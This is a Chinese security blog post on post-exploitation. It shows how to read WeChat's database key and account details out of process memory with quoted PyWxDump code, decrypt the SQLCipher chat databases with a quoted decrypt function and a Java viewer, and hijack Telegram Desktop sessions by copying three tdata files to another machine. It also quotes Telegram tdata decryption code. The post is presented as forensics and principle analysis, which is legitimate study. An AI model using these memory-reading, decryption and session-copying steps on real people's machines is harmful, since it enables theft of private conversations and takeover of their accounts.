浅析 后渗透之提取微x 聊天记录原理and劫持t g 解密聊天记录原理

最近工作中遇到许多取证工作,有相关部门人员咨询相关技术问题,那么,借此机会,今天麋鹿带大家了解一下解密wx聊天记录,以及劫持tg账号,顺便浅析一下原理

先聊微x

如何获取微x的key

贴一个代码,源自此项目

https://github.com/xaoyaoo/PyWxDump

麋鹿摘选了部分关键代码来探讨如何获取wxid key这些

# 读取内存中的字符串(非key部分)

def get_info_without_key(h_process, address, n_size=64):

array = ctypes.create_string_buffer(n_size)

if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"

array = bytes(array).split(b"\x00")[0] if b"\x00" in array else bytes(array)

text = array.decode('utf-8', errors='ignore')

return text.strip() if text.strip() != "" else "None"

def get_info_wxid(h_process, address, n_size=32, address_len=8):

array = ctypes.create_string_buffer(address_len)

if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"

address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)

wxid = get_info_without_key(h_process, address, n_size)

if not wxid.startswith("wxid_"): wxid = "None"

return wxid

# 读取内存中的key

def get_key(h_process, address, address_len=8):

array = ctypes.create_string_buffer(address_len)

if ReadProcessMemory(h_process, void_p(address), array, address_len, 0) == 0: return "None"

address = int.from_bytes(array, byteorder='little') # 逆序转换为int地址(key地址)

key = ctypes.create_string_buffer(32)

if ReadProcessMemory(h_process, void_p(address), key, 32, 0) == 0: return "None"

key_string = bytes(key).hex()

return key_string

# 读取信息(account,mobile,name,mail,wxid,key)

def read_info(version_list):

wechat_process = []

result = []

for process in psutil.process_iter(['name', 'exe', 'pid', 'cmdline']):

if process.name() == 'WeChat.exe':

wechat_process.append(process)

if len(wechat_process) == 0:

return "[-] WeChat No Run"

for process in wechat_process:

tmp_rd = {}

tmp_rd['pid'] = process.pid

tmp_rd['version'] = Dispatch("Scripting.FileSystemObject").GetFileVersion(process.exe())

bias_list = version_list.get(tmp_rd['version'], None)

if not isinstance(bias_list, list):

return f"[-] WeChat Current Version {tmp_rd['version']} Is Not Supported"

wechat_base_address = 0

for module in process.memory_maps(grouped=False):

if module.path and 'WeChatWin.dll' in module.path:

wechat_base_address = int(module.addr, 16)

break

if wechat_base_address == 0:

return f"[-] WeChat WeChatWin.dll Not Found"

Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)

account__baseaddr = wechat_base_address + bias_list[1]

tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"

result.append(tmp_rd)

return result

运行就可以得到key

获取key的原理

现在开始分析一下上面代码的原理

首先读取微x版本然后获得该版本的偏移地址(各版本偏移地址网上一大堆,上面那款工具里也自带 如下../version_list.json)

这些数字是什么意思呢,麋鹿随便找了个版本地址,前五个地址分别对应昵称、账号、手机号、邮箱(过时)、key

"3.9.2.23": [

50320784,

50321712,

50320640,

38986104,

50321676,

50592864

],

举个例子,要获取account字符(也就是修改后自定义的id,比如我的是i_still_be_milu)是如下过程

read_info(version_list)函数

1.用 psutil.process_iter 遍历所有正在运行的进程,并将所有进程的名称、可执行文件路径、进程ID以及命令行信息传入process 对象

2.检查当前进程的名称是否为 'WeChat.exe',也就是找wx进程,所以获取key是需要该机器登录着微x

if process.name() == 'WeChat.exe':

3.把WeChat微x进程的 PID存储到 tmp_rd 字典

tmp_rd['pid'] = process.pid

4.获取与当前 WeChat 进程版本对应的偏移量列表,还记得上面说到的那个记录微x各版本偏移地址的json文件吗,就是在这里读取到对应的偏移地址

bias_list = version_list.get(tmp_rd['version'], None)

5.查看是否包含WeChatWin.dll模块

if module.path and 'WeChatWin.dll' in module.path:

6.如果找到WeChatWin.dll,使用 ctypes 库调用 Windows 的 kernel32.dll 中的 OpenProcess 函数,打开该进程相关联的句柄,接着读微x进程的内存

Handle = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, process.pid)

参数 0x1F0FFF 是 PROCESS_ALL_ACCESS,表示请求所有可能的访问权限;False 表示句柄不会被继承;process.pid 是当前 WeChat 进程的 PID

7.通过将wechat_base_address与bias_list[1]相加来获取微x进程的account信息的内存地址

account__baseaddr = wechat_base_address + bias_list[1]

8.用前面获取的句柄 Handle 和基址传入get_info_without_key函数读取微x内存中的数据

tmp_rd['account'] = get_info_without_key(Handle, account__baseaddr, 32) if bias_list[1] != 0 else "None"

如果对应的偏移量为0,则表示该信息不存在,返回 "None"。

进入get_info_without_key函数

9.创建一个字符串缓冲区,用于存储从进程中读取的数据。

调用 Windows API 函数 ReadProcessMemory,从进程地址 address 中读取相应数据赋值到 array 。如果读取失败,则返回 "None"。

if ReadProcessMemory(h_process, void_p(address), array, n_size, 0) == 0: return "None"

10.然后解码成utf-8并去掉字符串两端的空白字符,最后得到array,也就是account的值

get_info_wxid函数和without函数功能大同小异,不重新解读

只说一点,windows下是地址是小端序,所以用int.from_bytes将字节数组逆序排列并转换为整数类型

至此,流程一目了然,下一步:

如何解密数据库

1.首先把刚才在获取到的key保存成如下格式

每两个字符前加一个0x,并用","分割开,该文件重命名为DBPass.Bin

2.打开聊天记录目录下的MSG文件夹中找到MicroMsg.db文件

3.在上一步的文件夹中找到Multi目录,在Multi目录找到MSG0.db文件

4.把上面三个文件传到我们的机器,放到一个目录,记为A目录

5.在解密的机器下载javafx-sdk-18.0.2和java环境(本机jdk11)

这里记javafx-sdk-18.0.2\lib的目录为B

记jdk-11.0.2\bin目录为C

6.在C目录,也就是jdk-11.0.2\bin目录运行下面命令

javaw.exe --module-path "B路径" --add-modules=javafx.base --add-modules=javafx.controls --add-modules=javafx.fxml --add-modules=javafx.graphics --add-modules=javafx.media --add-modules=javafx.swing --add-modules=javafx.web -jar chatViewTool.jar

解密工具就运行起来了

然后再1和2处都选择A目录,先1后2

至此,如下图,解密完成

翻一翻有可能找到有用信息

解密数据库原理

还记得聊天记录目录下的那些.db文件吗,毫无疑问这些都是加密过的SQLite数据库文件(sqlite3),那么该如何解密这个文件呢,还是像以往一样,麋鹿节选一段代码,依然选自本文开头的那个github项目

# 通过密钥解密数据库

def decrypt(key: str, db_path, out_path):

if not os.path.exists(db_path):

return f"[-] db_path:'{db_path}' File not found!"

if not os.path.exists(os.path.dirname(out_path)):

return f"[-] out_path:'{out_path}' File not found!"

if len(key) != 64:

return f"[-] key:'{key}' Error!"

password = bytes.fromhex(key.strip())

with open(db_path, "rb") as file:

blist = file.read()

salt = blist[:16]

byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)

first = blist[16:DEFAULT_PAGESIZE]

mac_salt = bytes([(salt[i] ^ 58) for i in range(16)])

mac_key = hashlib.pbkdf2_hmac("sha1", byteKey, mac_salt, 2, KEY_SIZE)

hash_mac = hmac.new(mac_key, first[:-32], hashlib.sha1)

hash_mac.update(b'\x01\x00\x00\x00')

if hash_mac.digest() != first[-32:-12]:

return f"[-] Password Error! (key:'{key}'; db_path:'{db_path}'; out_path:'{out_path}' )"

newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

with open(out_path, "wb") as deFile:

deFile.write(SQLITE_FILE_HEADER.encode())

t = AES.new(byteKey, AES.MODE_CBC, first[-48:-32])

decrypted = t.decrypt(first[:-48])

deFile.write(decrypted)

deFile.write(first[-48:])

for i in newblist:

t = AES.new(byteKey, AES.MODE_CBC, i[-48:-32])

decrypted = t.decrypt(i[:-48])

deFile.write(decrypted)

deFile.write(i[-48:])

return [True, db_path, out_path, key]

def batch_decrypt(key: str, db_path: Union[str, List[str]], out_path: str):

if not isinstance(key, str) or not isinstance(out_path, str) or not os.path.exists(out_path) or len(key) != 64:

return f"[-] (key:'{key}' or out_path:'{out_path}') Error!"

process_list = []

if isinstance(db_path, str):

if not os.path.exists(db_path):

return f"[-] db_path:'{db_path}' not found!"

if os.path.isfile(db_path):

inpath = db_path

outpath = os.path.join(out_path, 'de_' + os.path.basename(db_path))

process_list.append([key, inpath, outpath])

elif os.path.isdir(db_path):

for root, dirs, files in os.walk(db_path):

for file in files:

inpath = os.path.join(root, file)

rel = os.path.relpath(root, db_path)

outpath = os.path.join(out_path, rel, 'de_' + file)

if not os.path.exists(os.path.dirname(outpath)):

os.makedirs(os.path.dirname(outpath))

process_list.append([key, inpath, outpath])

else:

return f"[-] db_path:'{db_path}' Error "

elif isinstance(db_path, list):

rt_path = os.path.commonprefix(db_path)

if not os.path.exists(rt_path):

rt_path = os.path.dirname(rt_path)

for inpath in db_path:

if not os.path.exists(inpath):

return f"[-] db_path:'{db_path}' not found!"

inpath = os.path.normpath(inpath)

rel = os.path.relpath(os.path.dirname(inpath), rt_path)

outpath = os.path.join(out_path, rel, 'de_' + os.path.basename(inpath))

if not os.path.exists(os.path.dirname(outpath)):

os.makedirs(os.path.dirname(outpath))

process_list.append([key, inpath, outpath])

else:

return f"[-] db_path:'{db_path}' Error "

result = []

for i in process_list:

result.append(decrypt(*i)) # 解密

# 删除空文件夹

for root, dirs, files in os.walk(out_path, topdown=False):

for dir in dirs:

if not os.listdir(os.path.join(root, dir)):

os.rmdir(os.path.join(root, dir))

return result

该代码核心在于decrypt()函数,故只解读此函数

提前说几个知识点,希望有助于读者理解下文

1.微信用的加密算法是256位的AES-CBC

2.数据库的默认的页大小是4096字节即4KB

3. 每一个数据库文件的开头16字节都保存了一段唯一且随机的盐值,作为HMAC的验证和数据的解密

4.加密文件的每一页都存有着消息认证码,算法使用的是HMAC-SHA1

5.用来计算HMAC的key与解密的key是不同的,解密用的密钥是主密钥和之前提到的16字节的盐值变化得到的

decrypt()解密函数

1.接受三个参数:密钥(字符串类型)、数据库路径(字符串类型)和输出路径(字符串类型)。

def decrypt(key: str, db_path, out_path):

2.前几行都是检测传入的那两个路径和key长度(64位)是否正确,跳过

将key转换为字节串。key.strip()是移除密钥字符串两端的空白字符。

password = bytes.fromhex(key.strip())

3.以二进制模式打开数据库文件,将整个数据库文件读取到一个字节串blist,并从字节串中提取前16个字节作为盐值(计为A)

with open(db_path, "rb") as file:

blist = file.read()

salt = blist[:16]

4.使用密码(key)、盐值(A)和DEFAULT_ITER参数(前面声明过)来生成一个密钥。这里使用了SHA-1哈希函数和默认的迭代次数和密钥大小

byteKey = hashlib.pbkdf2_hmac("sha1", password, salt, DEFAULT_ITER, KEY_SIZE)

5,下面几行用于计算用于验证数据库完整性的MAC(消息认证码)。这里使用了SHA-1哈希函数和HMAC(带密钥的哈希算法)。如果计算出的HMAC与存储在数据库中的HMAC不匹配,则返回一个错误

过程简单一点来说,就是生成一个新的盐值(记为B),用B key和DEFAULT_ITE生成一个新密钥,然后用计算出的HMAC是否与存储在数据库中的HMAC相匹配

6.分割blist

newblist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

7.用AES加密算法和CBC模式创建一个新的加密器,使用前面生成的密钥作为初始化向量,然后解密,写入文件

decrypted = t.decrypt(first[:-48])

deFile.write(decrypted)

8.重复上面过程,解密每一个块,结束

限于本文篇幅,以及为了增加文章可读性,麋鹿在解密的过程中省略了一些的细节,毕竟这东西实在是枯燥无味,麋鹿连sqlite3.connect这些函数都未做介绍,感兴趣的读者可以自己去读一下该项目的源码,最后,附上几个吾私以为不错的工具and文章

https://www.52pojie.cn/thread-1084703-1-1.html

https://github.com/x1hy9/WeChatUserDB

https://github.com/HackerDev-Felix/WechatDecrypt/blob/main/wechat.cpp

https://www.zetetic.net/sqlcipher/design/

再聊tg

tg目录结构

tg用户数据存放在安装目录下的tdata文件夹内。

一个有效的Telegram登录用户的目录结构如下:

形象一点讲,就是下面这个样子

其中,重点说一下这几个文件

tdata/key_datas保存了解密文件的密钥localKey

tdata/D877F783D5D3EF8Cs保存了与云端通信的主密钥和用户的userId

tdata/D877F783D5D3EF8C/map保存了用户的基本信息,如用户id,头像,姓名,注册电话,上次在线时间

key_datas保存了解密其他文件的主密钥localKey

认证和加密流程

telegram所使用的mproto通信协议是自己开发的,不过多解读

对文件和消息进行加密则用的是AES-IGE模式

Session劫持

因为tg是支持多端登录的,所以能通过迁移tdata的方法来保持session

如果对方聊天记录特别多,那么复制整个tdata文件夹的这个办法实在是过于臃肿局限,所以一般情况只需要复制下面三个文件即可达到劫持目的

tdata/key_datas

tdata/D877F783D5D3EF8Cs

tdata/D877F783D5D3EF8C/map

如上图所示,把这三个文件(登录tg的A机器里)复制到另外一台机器(B)对应目录以后,在B机器运行tg程序即可劫持,可以正常收到消息

还有一种情况,如果对方机器上登录过多个不同账号

对应文件名按如下顺序生成

D877F783D5D3EF8C

A7FDF864FBC10B77

F8806DD0C461824F

C2B05980D9127787

0CA814316818D8F6

一些重点

如果想两台机器同时登录这个被劫持的tg号,需要在账号本人的机器上挂代理,要不会掉

如果tg开启了两步验证,需要知道密码

加解密原理分析

不想贴tg的代码分析了,显得文章过于臃肿,贴一个前辈的文章吧

https://www.ifmobi.com/telegram/1150.html

如这篇文章所诉,加密的代码在下面这三个文件

storage_file_utilities.cpp

mtproto_auth_key.h

mtproto_auth_key.cpp

解密过程

先用sha512(salt + passcode + salt)生成hash值

接下来再调用pbkdf2_hmac函数,将hash和salt作为输入参数,进行重复计算后得到最终的导出密钥passcode_key,然后带入decrypt_local解出local_key最后用local_key去解密其他文件

(只截取部分关键代码)

class TdataReader:

DEFAULT_DATANAME = 'data'

def __init__(self, base_path: str, dataname: str = None):

self._base_path = base_path

self._dataname = dataname or TdataReader.DEFAULT_DATANAME

def read(self, passcode: str = None) -> ParsedTdata:

parsed_tdata = ParsedTdata()

parsed_tdata.settings = self.read_settings()

local_key, account_indexes = self.read_key_data(passcode)

accounts = {}

for account_index in account_indexes:

account_reader = AccountReader(self._base_path, account_index, self._dataname)

accounts[account_index] = account_reader.read(local_key)

parsed_tdata.accounts = accounts

return parsed_tdata

def read_key_data(self, passcode: str = None) -> Tuple[bytes, List[int]]:

if passcode is None:

passcode = ''

key_data_tdf = read_tdf_file(self._path(self._key_data_name()))

local_key, account_indexes_data = decrypt_key_data_tdf(passcode.encode(), key_data_tdf)

account_indexes, _ = read_key_data_accounts(BytesIO(account_indexes_data))

return local_key, account_indexes

def create_local_key(passcode: bytes, salt: bytes) -> bytes:

if passcode:

iterations = kStrongIterationsCount

else:

iterations = 1

password = hashlib.sha512(salt + passcode + salt).digest()

return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)

def create_legacy_local_key(passcode: bytes, salt: bytes) -> bytes:

if passcode:

iterations = LocalEncryptIterCount

else:

iterations = LocalEncryptNoPwdIterCount

return hashlib.pbkdf2_hmac('sha1', passcode, salt, iterations, 256)

def decrypt_key_data_tdf(passcode: bytes, key_data_tdf: RawTdfFile):

stream = BytesIO(key_data_tdf.encrypted_data)

salt = read_qt_byte_array(stream)

key_encrypted = read_qt_byte_array(stream)

info_encrypted = read_qt_byte_array(stream)

passcode_key = create_local_key(passcode, salt)

local_key = decrypt_local(key_encrypted, passcode_key)

info_decrypted = decrypt_local(info_encrypted, local_key)

return local_key, info_decrypted

def create_local_key(passcode: bytes, salt: bytes) -> bytes:

if passcode:

iterations = kStrongIterationsCount

else:

iterations = 1

password = hashlib.sha512(salt + passcode + salt).digest()

return hashlib.pbkdf2_hmac('sha512', password, salt, iterations, 256)

这里麋鹿实在是想展开好好讲讲,可是这样会文章过于臃肿,而又有很少的读者会有耐心和兴趣读下去,其次实在是浪费麋鹿自身时间,最关键的是我今晚写文章忘了吃饭,现在饿的头晕,不夸张,是真的快饿倒了,现在大脑十分疲惫加上着急去吃饭,怕一时笔误误导读者

故鉴于以上原因,麋鹿这里依然省略部分细节问题,最后放上一个解密工具,有兴趣的读者可以自行阅读代码

https://github.com/ntqbit/tdesktop-decrypter

同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在公众号平台,如果不想错过我们新鲜出炉的好文,那就请扫码关注我们的公众号!(附上本人微信,欢迎各位同仁加我微信,和我探讨安全,同时欢迎同仁们的不吝指正)